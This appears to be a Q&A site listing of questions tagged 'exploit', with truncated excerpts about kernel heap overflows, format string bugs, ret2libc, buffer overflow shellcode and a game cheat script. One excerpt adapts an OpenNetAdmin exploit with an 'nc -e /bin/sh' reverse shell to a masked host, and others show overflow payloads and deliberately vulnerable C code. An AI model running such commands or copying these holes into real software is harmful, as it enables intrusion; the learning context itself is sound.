Questions tagged [exploit]

An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur. This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.

790 questions
-1
votes
1 answer

Does SMAP/SMEP block allocation in userland (kmalloc)?

I am trying to exploit a heap overflow in Linux kernel with all the protections enable i.e. SMAP and SMEP. What I understand is that SMEP doesn't allow me to execute userland code and SMAP doesn't allow me to read or write to userland. But I am…
user40061
  • 85
  • 2
  • 5
-1
votes
1 answer

Format string attack, convert output to readable format in bash

I'm working on a ctf challenge. This is the relevant code section, void details(){ char name[100]; printf("Please enter your name: "); scanf("%100s", name); printf("Hello %s!\n", name); } If I EOF scanf/stdin, printf will…
sven
  • 1
  • 1
  • 2
-1
votes
1 answer

gdb reads wrong input(stdin) values

I input the following in gdb for ret2libc. (gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")') The program being debugged has been started…
Kingslayer
  • 53
  • 1
  • 8
-1
votes
2 answers

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for the OpenNetAdmin 18.1.1 I have to adjust this script so it work for me but I don't get this done. This is what I have so far: URL="xxx.xxx.xxx.xxx/ona" while true;do echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx…
Soteri
  • 327
  • 4
  • 21
-1
votes
2 answers

Buffer overflow: overrwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following: xor ch, 0 ... cmp dword ptr [ebp+10h],…
S. L.
  • 630
  • 8
  • 19
-1
votes
1 answer

How do I send raw bytes interactively for a buffer overflow exploit?

I am trying, as part of an exercise, to exploit a simple program by overwriting a value of a variable though a buffer overflow. I am pretty sure I have the idea behind the exploit figured out, but since I am unable to inject my code I can't know for…
A39-A20
  • 35
  • 2
  • 9
-1
votes
2 answers

Script stops after a few seconds

I have this exploit for Murder Mystery 2. It is a tpcoins and esp exploit. When I enable the tpcoins it will turn off after a few seconds. Is there any way of making it so it stays on? Here's the code: function enableTpCoin() if nameMap ~= "" and…
user9954845
-1
votes
1 answer

Ret2libc unexpected output

I can't understand why when I try to exploit a ret2libc I always get this output sh: 1: 34:ln=01: not found sh: 1: 36:mh=00:pi=40: not found sh: 1: 33:so=01: not found sh: 1: 35:do=01: not found sh: 1: 35:bd=40: not found sh: 1: 33: not found ...…
alexsius
  • 43
  • 1
  • 7
-1
votes
1 answer

How to reverse the effects of movl

So when movl (in intel x84-64 machine code) is called and has a register as the destination, it sets the higher order bytes of the register to 0. So how can i use the movl instruction such that I preserve the original value of the register? In this…
-1
votes
1 answer

Segmentation Fault during Exploit

I tried to execute a shellcode with buffer overflow. Unfortunately I get a segmentation error. In the following the c code asm code and exploit code: C Code: int main(int argc, char **argv) { char buffer[64]; gets(buffer); } ASM Code: …
elguerrero
  • 59
  • 1
  • 1
  • 8
-1
votes
1 answer

C Windows/Linux Buffer Overflow Exploits

I have looked at how the buffer overflows work and have to determine that the program (with gcc) must compile with the following parameters: -fno-stackprotector and -z execstack. You have to tell the kernel that it does not randomly allocate the…
Emanuel Bennici
  • 426
  • 3
  • 13
-1
votes
1 answer

Why is this the structure of the exploit

So I tried following a tutorial: https://sploitfun.wordpress.com/2015/05/08/classic-stack-based-buffer-overflow/ I was struggling with figuring out the order of the exploit code, atleast in someway. I don't get the reason for first putting NOPS and…
Jonathan
  • 119
  • 1
  • 10
-1
votes
1 answer

Buffer-Overflow exploit code

[Buffer - overflow exploit code][1] Hi so i'm doing an exploit on the windows 2000 server as part of an assignment and needed a little help. I've attached a screenshot of the exploit code thats in the c document but i dont really understand what…
786
  • 7
  • 3
-1
votes
1 answer

GDB - see what have accessed the address/break on it

I am trying to overwrite the function vtable: Here it is done: Before memcpy (gdb) x/100x 0xb7993150 0xb7993150: 0xb6eae130 0xb6eae130 0x41414141 0x41414141 0xb7993160: 0x41414141 0x41414141 0x41414141 …
dev
  • 1,119
  • 1
  • 11
  • 34
-1
votes
1 answer

Format String Exploit, unexpected result

I'm trying to implement simple example of Format String Vulnerability in C on 64-bits Linux. Here is my source code: void not_called() { printf("Exploited\n"); } int main(int argc, char **argv) { // Buffer overflow vulnerability char…
Tuomas Toivonen
  • 21,690
  • 47
  • 129
  • 225